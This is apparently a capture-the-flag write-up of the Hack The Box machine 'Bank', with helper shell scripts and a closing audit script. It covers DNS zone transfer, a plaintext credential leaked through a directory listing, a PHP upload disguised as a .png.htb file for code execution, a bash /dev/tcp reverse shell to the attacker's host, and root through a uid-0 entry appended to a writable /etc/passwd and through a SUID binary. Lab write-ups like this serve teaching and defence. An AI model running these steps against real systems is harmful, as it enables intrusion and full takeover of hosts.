
HTB: Bank Write-Up

Recon

nmap

Let's start with a full TCP port scan of the target to see which services are exposed and what versions they run.

# Nmap 7.94 scan initiated Sun Nov 12 02:18:04 2023 as: nmap -vvv -Pn -sCV --open -T4 -p0-65535 -oN bank.nmap 10.10.10.29
Nmap scan report for 10.10.10.29
Host is up, received user-set (0.33s latency).
Scanned at 2023-11-12 02:18:04 EST for 84s
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAMJ+YATka9wvs0FTz8iNWs6uCiLqSFhmBYoYAorFpozVGkCkU1aEJ7biybFTw/qzS9pbSsaYA+3LyUyvh3BSPGEt1BgGW/H29MuXjkznwVz60JqL4GqaJzYSL3smYYdr3KdJQI/QSvf34WU3pife6LRmJaVk+ETh3wPclyecNtedAAAAFQC1Zb2O2LzvAWf20FdsK8HRPlrx1wAAAIBIBAhLmVd3Tz+o+6Oz39g4Um1le8d3DETINWk3myRvPw8hcnRwAFe1+14h3RX4fr+LKXoR/tYrI138PJyiyl+YtQWhZnJ7j8lqnKRU2YibtnUc44kP9FhUqeAcBNjj4qwG9GyQSWm/Q5CbOokgaa6WfdcnwsUMim0h2Ad8YdU1kAAAAIBy3dOOD8jKHeBdE/oXGG0X9tKSFZv1gPr/kZ7NfqUF0kHU3oZTNK8/2qR0SNHgrZ2cLgKTIuneGS8lauXjC66NNMoUkJcMHpwRkYC0A86LDmhES6OuPsQwAjr1AtUZn97QjYu1d6WPfhTdsRYBuCotgKh2SBkzV1Bcz77Tnp56JA==
|   2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDc0rofjHtpSlqkDjjnkEiYcbUrMH0Q4a6PcxqsR3updDGBWu/RK7AGWRSjPn13uil/nl44XF/fkULy7FoXXskByLCHP8FS2gYJApQMvI9n81ERojEA0NIi6VZKP19bl1VFTk7Q5rEPIpab2xqYMBayb1ch7iP95n3iayvHEt/7cSTsddGWKeALi+rrujpnryNViiOIWpqDv+RWtbc2Wuc/FTeGSOt1LBTbtKcLwEehBG+Ym8o8iKTd+zfVudu7v1g3W2Aa3zLuTcePRKLUK3Q2D7k+5aJnWrekpiARQm3NmMkv1NuDLeW3amVBCv6DRJPBqEgSeGMGsnqkR8CKHO9/
|   256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDH30xnPq1XEub/UFQ2KoHXh9LFKMNMkt60xYF3OrEp1Y5XQd0QyeLXwm6tIqWtb0rWda/ivDgmiB4GzCIMf/HQ=
|   256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIA8MYjFyo+4OwYGTzeuyNd998y6cOx56mIuciim1cvKh
53/tcp open  domain  syn-ack ttl 63 ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.9.5-3ubuntu0.14-Ubuntu
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.7 ((Ubuntu))
| http-methods: 
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.7 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Nov 12 02:19:28 2023 -- 1 IP address (1 host up) scanned in 83.86 seconds

The scan shows three open TCP ports on 10.10.10.29 and a consistent picture of the host:

  1. SSH (22/tcp):

    • OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8. Together with Apache 2.4.7 and BIND 9.9.5 below, this is the package set of Ubuntu 14.04, so the box is an old Trusty system.

    • Host keys offered: DSA (a 1024-bit ssh-dss key, deprecated and disabled by default in OpenSSH clients since 7.0), RSA, ECDSA and ED25519. Nmap prints the public host keys, not anything secret; they are mainly useful for recognising the same host if it turns up behind another address.

    • SSH is the obvious way to turn any credentials, or a writable /etc/passwd, into an interactive session later on.

  2. DNS (53/tcp):

    • ISC BIND 9.9.5-3ubuntu0.14, confirmed by the dns-nsid script reading bind.version. The server answers over TCP, which is what a zone transfer (AXFR) uses, so the next step is to guess the zone name (bank.htb, following the HTB convention) and try dig axfr against it.

  3. HTTP (80/tcp):

    • Apache httpd 2.4.7 (Ubuntu); methods GET, HEAD, POST and OPTIONS, no TRACE.

    • The title is the Apache2 Ubuntu default page. That is what Apache serves when the request carries no Host header matching a configured virtual host, so the real application is probably behind a name-based virtual host and has to be addressed as bank.htb rather than by IP.

  4. Other details:

    • ttl 63 on the syn-ack replies is one below the Linux default of 64, consistent with a Linux host one hop (the VPN gateway) away.

    • 0.33 s latency is the VPN round trip, not a property of the target.

Ports 0 to 65535 were covered and only these three are open, so the attack surface is DNS, the web application and, once credentials exist, SSH.

DNS

dig

With the standard DNS tool dig, available on any Linux box, the following recon can be run against the target's name server.

The commands take a zone transfer from the target and turn the host names it leaks into a ready-to-paste /etc/hosts line. Step by step:

  1. Zone transfer with dig:

    • dig axfr bank.htb @10.10.10.29 asks the server for a full copy of the bank.htb zone. AXFR runs over TCP 53, which the scan showed open. A name server that answers this for an arbitrary client has no allow-transfer restriction, and every record in the zone is handed over in one request.

  2. Filter with grep:

    • grep -E '(\w+\.)?\w+\.htb' keeps only the lines that contain a name under .htb.

  3. Print matches only with grep -o:

    • grep -oE '(\w+\.)?\w+\.htb' prints just the matched names, one per line, so the TTL, class and record-type columns disappear. The optional group allows one label in front of the zone (www.bank.htb); deeper names would need (\w+\.)* instead.

  4. Deduplicate with sort -u:

    • sort -u sorts the names and drops duplicates (the SOA record appears twice in an AXFR, and the same name shows up in several records).

  5. Join lines with tr:

    • tr '\n' ' ' turns the newline-separated list into a single space-separated line.

  6. Format with awk:

    • awk '{print "10.10.10.29\t" $1 " " $2 " " $3 " " $4}' prepends the target IP and a tab, giving a line in /etc/hosts format. It hard-codes four fields, which matches the four names this zone returns; a different zone needs the count adjusted.

  7. Copy with xclip:

    • xclip -selection clipboard puts the line on the clipboard for pasting into /etc/hosts.

The result is a one-liner that goes from "zone transfer allowed" to "every virtual host name resolves locally", which matters here because the web application is only reachable through its name.
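The pipeline above, rebuilt as shell functions so it can be run offline. This is an added example, not the write-up's own commands: the dig transcript is constructed (the four host names are the ones this write-up reports for bank.htb, everything else in it is made up), the function names are mine, and the name regex is generalised from one label to any depth. The url_list function produces the http:// list that the Aquatone section below saves as bank.urls.

```shell
#!/bin/sh
# Added example, not the write-up's own commands: the dig/grep/sort/tr/awk
# pipeline rebuilt as functions, run offline against a constructed transcript.

# Constructed dig axfr transcript. The four host names are the ones the
# write-up reports for bank.htb; TTLs, serial and record types are made up.
sample_axfr() {
cat <<'EOF'
; <<>> DiG 9.18 <<>> axfr bank.htb @10.10.10.29
;; global options: +cmd
bank.htb.		604800	IN	SOA	bank.htb. chris.bank.htb. 5 604800 86400 2419200 604800
bank.htb.		604800	IN	NS	ns.bank.htb.
bank.htb.		604800	IN	A	10.10.10.29
ns.bank.htb.		604800	IN	A	10.10.10.29
www.bank.htb.		604800	IN	CNAME	bank.htb.
bank.htb.		604800	IN	SOA	bank.htb. chris.bank.htb. 5 604800 86400 2419200 604800
;; Query time: 330 msec
;; SERVER: 10.10.10.29#53(10.10.10.29) (TCP)
EOF
}

# Unique host names ending in the given zone, from a dig transcript on stdin.
# [[:alnum:]_-] replaces the page's \w so the pattern also works with non-GNU grep,
# and the repeated group accepts names of any depth, not just one label.
axfr_names() {
  zone=$(printf '%s' "$1" | sed 's/\./\\./g')   # escape dots for the regex
  grep -oE "([[:alnum:]_-]+\.)*[[:alnum:]_-]+\.${zone}" | sort -u
}

# One /etc/hosts line, "<ip><TAB><name> <name> ...", for every name found.
hosts_line() {
  ip=$1; zone=$2
  names=$(axfr_names "$zone" | tr '\n' ' ')
  printf '%s\t%s\n' "$ip" "${names% }"
}

# One http:// URL per name: the bank.urls file Aquatone and Nuclei consume.
url_list() {
  axfr_names "$1" | sed 's#^#http://#'
}

# On the target the transcript comes from dig itself (AXFR runs over TCP):
#   dig axfr bank.htb @10.10.10.29 | hosts_line 10.10.10.29 htb | sudo tee -a /etc/hosts
#   dig axfr bank.htb @10.10.10.29 | url_list htb > bank.urls
if [ "${1:-}" = "--demo" ]; then
  sample_axfr | hosts_line 10.10.10.29 htb
  sample_axfr | url_list htb
fi
```

Run with --demo to see the hosts line and the URL list produced from the constructed transcript; on the target, replace sample_axfr with the real dig call shown in the comments.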

To make my life a bit easier when working with DNS, I add the following entry to my local Kali machine's /etc/hosts file.

Web

WhatWeb

Since the Nmap scan result shows that TCP port 80 (HTTP) is open, I would like to confirm its operating system and version.

WhatWeb is a command-line web fingerprinting tool: it sends a request and matches the response headers and body against plugins that recognise servers, frameworks and CMSs. Reading its output for the target:

  1. URL: http://10.10.10.29

    • The request went to the bare IP, with no Host header for bank.htb.

  2. Response status: [200 OK]

    • The server answered normally.

  3. Web server: Apache [2.4.7]

    • Taken from the Server header. Apache 2.4.7 is the version Ubuntu 14.04 ships, which matches the OpenSSH and BIND versions from the port scan.

  4. Country: RESERVED [ZZ]

    • WhatWeb geolocates the IP; 10.0.0.0/8 is private address space, so the lookup returns the reserved code ZZ. Nothing to read into this.

  5. HTTP server: Ubuntu Linux [Apache/2.4.7 (Ubuntu)]

    • The "(Ubuntu)" suffix is the distribution's package build string, which is how WhatWeb infers the operating system. ServerTokens is at Ubuntu's default of OS, so the exact version and distribution are disclosed.

  6. IP address: 10.10.10.29

    • The resolved address of the target.

  7. Title: Apache2 Ubuntu Default Page: It works

    • The stock placeholder page. Apache serves it when the request's Host header (here, none) matches no configured virtual host.

So the IP address alone gives the default site; the banking application lives under the bank.htb name-based virtual host, which is why the remaining tools are pointed at http://bank.htb.

Aquatone

Aquatone takes a list of hosts or URLs, visits each one in headless Chromium and writes an HTML report with a screenshot, response headers and a technology summary per target, which is a quick way to see what each name from the zone transfer actually serves. The steps:

  1. Download Aquatone:

    • Fetch the release archive from GitHub with wget.

  2. Unzip Aquatone:

    • Extract the binary from the zip with unzip.

  3. Retrieve host names with dig:

    • Run the same zone transfer for bank.htb against 10.10.10.29, filter and sort the unique names, and save them to bank.urls.

  4. Prepend http:// with sed:

    • Add the http:// scheme to every line of bank.urls so each entry is a URL rather than a bare name.

  5. Feed the URLs to Aquatone:

    • Pipe bank.urls into aquatone on standard input; it screenshots and fingerprints each URL.

  6. Open the report:

    • Open the generated HTML report (aquatone_report.html) in Firefox.

Because Aquatone requests each name with its proper Host header, this is also where a name-based virtual host that the IP address alone hides becomes visible.

Gobuster

Gobuster brute-forces paths on a web server by requesting every entry of a wordlist and reporting the responses whose status is not in the ignored list. The scan here:

  1. Tool:

    • Gobuster 3.6 in dir mode (directory and file enumeration; the same tool also does DNS, vhost and cloud-bucket enumeration).

  2. Configuration:

    • URL: http://bank.htb (the virtual host name, not the IP, so the application rather than the default page is enumerated)

    • Method: GET

    • Threads: 100

    • Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

    • Negative status codes: 404 (responses with 404 are discarded)

    • User agent: gobuster/3.6

    • Timeout: 10 seconds

  3. Results:

    • /uploads: 301 to http://bank.htb/uploads/ (Apache's mod_dir adds the trailing slash, so a redirect to the same path with a slash means a real directory)

    • /assets: 301 to http://bank.htb/assets/

    • /inc: 301 to http://bank.htb/inc/

    • /server-status: 403 Forbidden (mod_status is loaded but restricted to local requests, the Ubuntu default)

    • /balance-transfer: 301 to http://bank.htb/balance-transfer/

Three of these matter for what follows. /balance-transfer turns out to have directory listing enabled, which is the information leak the Analysis section mines. /uploads is where a later file upload lands, and a web-writable directory that the server also executes from is the classic route to code execution. /inc is a common name for included PHP files and is worth listing for the same reason. /server-status answering 403 rather than 404 confirms mod_status is enabled, which is worth retrying from localhost once there is a foothold.

Nuclei

Nuclei runs a library of YAML templates (each a request plus matchers) against the URLs in bank.urls. Reading the run:

  1. Installation and version check:

    • The nuclei-templates are installed and Nuclei reports its own version (v3.0.2) and the loaded template version (v9.6.9).

  2. Template execution:

    • 7278 templates are loaded, signed and unsigned.

    • Templates with identical requests are clustered so one response serves several matchers: 1252 clusters, 4876 requests fewer than the naive total.

  3. Targets and Interactsh:

    • Four targets are loaded, one per URL in bank.urls.

    • Out-of-band templates use the public Interactsh server at oast.live. Anything that calls back from the target goes to a third-party host, which is fine on HTB but worth replacing with a self-hosted interactsh-server on a real engagement.

  4. HTTP methods and web server detection:

    • POST, OPTIONS, GET and HEAD are accepted, and the server is Apache/2.4.7 on Ubuntu, consistent with Nmap and WhatWeb.

  5. Findings:

    • Missing security headers (X-Frame-Options, Content-Security-Policy, Strict-Transport-Security). Informational on a plain-HTTP site, but they show the application has had no hardening.

    • A match for WEB-INF/web.xml exposure, reported with CVE-2021-28164. That CVE is an Eclipse Jetty path-normalisation bug and web.xml is a Java servlet artefact; on an Apache/PHP host this is almost certainly a false positive from a loose matcher, and should be confirmed by fetching the path by hand before it goes in any report.

    • SSH authentication methods enumerated, including password authentication. Not a vulnerability by itself, but it means any credentials found later can be used directly over SSH.

  6. Skipped targets:

    • Nuclei reports www.bank.htb, ns.bank.htb, chris.bank.htb and bank.htb as skipped after repeated errors. Nuclei drops a host once it exceeds its per-host error limit (-max-host-error, 30 by default), so the findings above are whatever completed before that threshold, not a full run; rerunning with lower concurrency or a higher limit would give fuller coverage.

The useful output is therefore confirmation of the server stack and of password-based SSH; the scanner did not find the way in, the directory listing did.

Analysis

The real find is http://bank.htb/balance-transfer/, which has directory listing enabled. The steps below pull the listing with curl and use the file sizes to find the one record that is different:

  1. Counting files ending in .acc:

    • curl fetches the listing HTML, grep -i '.acc' keeps the lines naming .acc files and wc -l counts them.

    • Result: 999 .acc files.

  2. Counting everything else:

    • The same fetch with grep -iv '.acc' keeps the remaining lines.

    • Result: 15 lines, which are the listing's own HTML (title, header, parent-directory link, table markup) rather than further data files.

  3. Listing names and sizes:

    • grep, cut and tr pull the file name and size out of each table row, sort orders them by size and head shows the first ten.

  4. Size statistics:

    • Extract just the size column, sort it and pass it through uniq -c to get a count per distinct size.

    • Nearly all of the .acc files fall within a few bytes of each other, because they hold the same record layout. A size that occurs once is the one to look at.

  5. Finding the odd one out:

    • Filter the listing for the entry with a size of 257 bytes.

    • Exactly one file matches.

  6. Reading it:

    • curl fetches 68576f20e9732f1b2edc4df5b8533230.acc.

    • It contains a full name, an email address, a password in plain text, a credit-card count, a transaction count and a balance. This record is the one that differs from the other 998, which is exactly why the size check found it.

  7. Recording the credentials:

    • The pair [email protected] : !##HTBB4nkP4ssw0rd!## is saved to creds.txt.

  8. Logging in:

    • The credentials work on the bank.htb login form.

    • Once inside, look for an upload feature, since Gobuster already showed a /uploads directory.

  9. Crafting the upload:

    • Build a request that uploads a PNG with PHP code inside it (the image wrapper is presumably there to satisfy the upload form's checks), and name the file so it ends in .htb.

  10. Why .htb:

    • The source of bank.htb/support.php carries a debug note saying the .htb extension was added to execute as PHP for debugging purposes. Apache will therefore run an uploaded .png.htb file as PHP, which is the gap between what the upload filter checks (an image) and what the server executes (the final extension).
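The size analysis from steps 1 to 5, as an added example that is not part of the write-up. The listing is a constructed Apache autoindex page: only the 257-byte file name is taken from the write-up, and the other names, dates and sizes are invented to mimic a cluster of near-identical records with one outlier. The function names are mine; on the target the same functions read the output of curl.

```shell
#!/bin/sh
# Added example, not the write-up's own commands: directory-listing size
# analysis as functions, run offline on a constructed Apache autoindex page.

# Constructed listing in the HTMLTable layout Apache 2.4's autoindex module
# emits on Ubuntu. Only the 257-byte file name comes from the write-up.
sample_index() {
cat <<'EOF'
<html><head><title>Index of /balance-transfer</title></head><body>
<h1>Index of /balance-transfer</h1>
<table>
<tr><th valign="top"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th></tr>
<tr><td valign="top"></td><td><a href="/">Parent Directory</a></td><td>&nbsp;</td><td align="right">  - </td></tr>
<tr><td valign="top"></td><td><a href="sample-01.acc">sample-01.acc</a></td><td align="right">2017-06-14 19:35  </td><td align="right">584 </td></tr>
<tr><td valign="top"></td><td><a href="sample-02.acc">sample-02.acc</a></td><td align="right">2017-06-14 19:35  </td><td align="right">583 </td></tr>
<tr><td valign="top"></td><td><a href="sample-03.acc">sample-03.acc</a></td><td align="right">2017-06-14 19:35  </td><td align="right">585 </td></tr>
<tr><td valign="top"></td><td><a href="sample-04.acc">sample-04.acc</a></td><td align="right">2017-06-14 19:35  </td><td align="right">584 </td></tr>
<tr><td valign="top"></td><td><a href="sample-05.acc">sample-05.acc</a></td><td align="right">2017-06-14 19:35  </td><td align="right">583 </td></tr>
<tr><td valign="top"></td><td><a href="68576f20e9732f1b2edc4df5b8533230.acc">68576f20e9732f1b2edc4df5b8533230.acc</a></td><td align="right">2017-06-14 19:35  </td><td align="right">257 </td></tr>
<tr><td valign="top"></td><td><a href="sample-06.acc">sample-06.acc</a></td><td align="right">2017-06-14 19:35  </td><td align="right">585 </td></tr>
</table></body></html>
EOF
}

# "<size> <name>" for every file row. Sort links (href="?...") and the parent
# directory (href="/") are excluded by the href pattern, and rows without a
# numeric size cell never match. Apache prints sizes under 1K in bytes and
# larger ones rounded (1.2K), so for big files compare Content-Length from
# HEAD requests instead of the listing.
index_entries() {
  sed -n 's|.*<a href="\([^"?/][^"]*\)">.*<td align="right">\([0-9.]*[KMG]*\) *</td>.*|\2 \1|p'
}

# How many files share each displayed size, most common first.
size_histogram() {
  awk '{ print $1 }' | sort | uniq -c | sort -rn
}

# Files whose size occurs exactly once: the records worth reading first.
size_outliers() {
  awk '{ count[$1]++; size[NR] = $1; name[NR] = $2 }
       END { for (i = 1; i <= NR; i++) if (count[size[i]] == 1) print size[i], name[i] }'
}

# Against the live listing:
#   curl -s http://bank.htb/balance-transfer/ | index_entries | size_outliers
if [ "${1:-}" = "--demo" ]; then
  sample_index | index_entries | size_histogram
  sample_index | index_entries | size_outliers
fi
```

Run with --demo to see the histogram (three sizes shared by two files each, 257 once) and the single outlier. The same approach works on any directory listing of uniformly generated files: whatever breaks the size pattern is where to read first.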

Burp Suite - Repeater
Remote Code Execution - RCE

The crafted upload request is sent from Burp Suite's Repeater, and requesting the uploaded .htb file afterwards executes the embedded PHP: that is the remote code execution the next section turns into a shell.

pwncat

The foothold is turned into a shell and the host is enumerated for privilege escalation. Step by step:

  1. Reverse shell:

    • curl requests the uploaded file at http://bank.htb/uploads/implant.png.htb and passes it a command: bash -c with standard input and output redirected to 10.10.16.3:443 (a bash /dev/tcp reverse shell). The web server executes the embedded PHP as the www-data user, and that process connects back to the attacker.

  2. Installing pwncat:

    • pwncat is installed with apt. It is a netcat-style listener that also handles TTY upgrade and keeps the session usable, which is why it is preferred over plain nc for catching shells.

  3. Catching the shell:

    • pwncat listens on TCP 443. Port 443 is chosen because outbound HTTPS is rarely blocked. The connection arrives as www-data.

  4. SUID binaries:

    • find with -perm -4000 lists files with the set-user-ID bit. Among the expected system binaries is /var/htb/bin/emergency, outside any standard system directory, so it is not something the distribution installed and is the first candidate for escalation.

  5. /etc/passwd permissions:

    • ls -l /etc/passwd shows -rw-rw-rw-, mode 666: any user can write it. Because the second field of a passwd entry is used as the password hash whenever it is not "x", a writable passwd lets any user create a uid-0 account with a password of their choosing.

  6. sshd configuration:

    • /etc/ssh/sshd_config has PermitRootLogin yes. sshd applies this setting to every account with uid 0, not only the one named root, so it is what allows an injected uid-0 user to log in over SSH with a password.

Two independent paths to root come out of this enumeration, the SUID binary and the writable passwd file, and both are exploited in the next section.

Exploits

Writable /etc/passwd

With /etc/passwd writable, a root account is added directly. Step by step:

  1. Generating the hash:

    • openssl passwd -1 produces an MD5-crypt hash of "P@ssword1!", here $1$pwkb5t.S$NoHDeEhSIZke0vni9akQK0. The -1 format is old but glibc's crypt still accepts it; the salt (pwkb5t.S) is random, so rerunning the command gives a different string for the same password.

  2. Appending the entry:

    • echo appends a line of the form tyla:<hash>:0:0:root:/root:/bin/bash to /etc/passwd: user name, the hash in the password field, uid 0, gid 0, GECOS, home directory and shell. Because the password field holds a hash rather than "x", the system never consults /etc/shadow for this account.

  3. Verifying:

    • cat /etc/passwd shows the new entry as the last line.

  4. Logging in:

    • ssh as tyla with P@ssword1! succeeds and the session is root, since uid 0 is root regardless of the name. Two settings seen earlier make this work: password authentication is enabled, and PermitRootLogin yes applies to this uid-0 account.

A world-writable /etc/passwd is a complete compromise in one line. The file should be mode 0644 owned by root, and any uid-0 entry other than root, or any entry whose second field is not "x", should trigger an alert.

SUID

The second path is the SUID binary found earlier:

  1. File type:

    • file /var/htb/bin/emergency reports a setuid ELF 32-bit LSB executable for Intel 80386, dynamically linked. "setuid" is the important word: the program runs with the file owner's privileges, and the owner is root.

  2. Running it:

    • Executing /var/htb/bin/emergency drops into a shell.

    • id shows euid=0 (root); the real uid is still www-data's, which is why id is the right check rather than trusting the prompt.

    • whoami reports root, since it looks at the effective user ID.

A SUID-root program that hands the caller a shell is root for every local user who can execute it. The binary lives outside any package-managed path, so a routine audit comparing SUID files against the package database or a baseline list would have flagged it; that is the control this machine is missing.
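To close, an added example that is not part of the write-up: a re-check of the three misconfigurations chained above (the unexpected SUID-root binary, the world-writable /etc/passwd and PermitRootLogin yes), written as shell functions that take a filesystem root so they run here against a constructed tree and on a target against /. The function names, the sample passwd contents (apart from the tyla line, which follows the entry described in the write-up, with the hash quoted from it) and the audit.sh file name are my assumptions.

```shell
#!/bin/sh
# Added example, not the write-up's own commands: re-check the three
# privilege-escalation findings against a filesystem root (/ on a target).

# Constructed /etc/passwd: stock accounts plus the uid-0 "tyla" entry the
# write-up appends (hash quoted from the page).
sample_passwd() {
cat <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
tyla:$1$pwkb5t.S$NoHDeEhSIZke0vni9akQK0:0:0:root:/root:/bin/bash
EOF
}

# SUID files outside the directories where package-managed SUID binaries live.
# /var/htb/bin/emergency is the kind of path this surfaces.
unexpected_suid() {
  root=${1:-/}
  find "$root" -xdev -type f -perm -4000 2>/dev/null |
    sed "s#^${root%/}##" |
    grep -Ev '^/(usr/)?s?bin/|^/usr/lib(exec)?/'
  return 0
}

# True when the "other" write bit is set on <root>/etc/passwd (the -rw-rw-rw- case).
passwd_world_writable() {
  f=${1:-/}; f=${f%/}/etc/passwd
  case $(ls -ld "$f" 2>/dev/null | cut -c9) in
    w) return 0 ;;
    *) return 1 ;;
  esac
}

# Accounts that are uid 0 under a name other than root, or that carry a
# crypt-style hash in the password field instead of the "x" that defers to
# /etc/shadow. Both are what a passwd-injection privesc leaves behind.
rogue_passwd_entries() {
  f=${1:-/}; f=${f%/}/etc/passwd
  awk -F: '
    NF != 7                  { print "malformed:" $0; next }
    $3 == 0 && $1 != "root"  { print "uid0:" $1 }
    $2 ~ /^\$/               { print "hash-in-passwd:" $1 }
  ' "$f"
}

# Effective PermitRootLogin: sshd honours the first uncommented occurrence.
# It gates every uid-0 account, so "yes" is what lets an injected user in.
permit_root_login() {
  f=${1:-/}; f=${f%/}/etc/ssh/sshd_config
  awk 'tolower($1) == "permitrootlogin" { print tolower($2); found = 1; exit }
       END { if (!found) print "not-set" }' "$f"
}

audit_root() {
  root=${1:-/}
  unexpected_suid "$root" | sed 's/^/suid: /'
  passwd_world_writable "$root" && echo "passwd: world-writable"
  rogue_passwd_entries "$root"
  echo "PermitRootLogin: $(permit_root_login "$root")"
}

# On a live system: sh audit.sh /
if [ -n "${1:-}" ]; then
  audit_root "$1"
fi
```

Against this box the audit prints the emergency binary, flags /etc/passwd as world-writable, lists tyla twice (uid 0 and a hash in the passwd field) and reports PermitRootLogin yes. The SUID check relies on a path allow-list, so on a real host follow it up with dpkg -S on each hit to confirm whether a package owns it.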
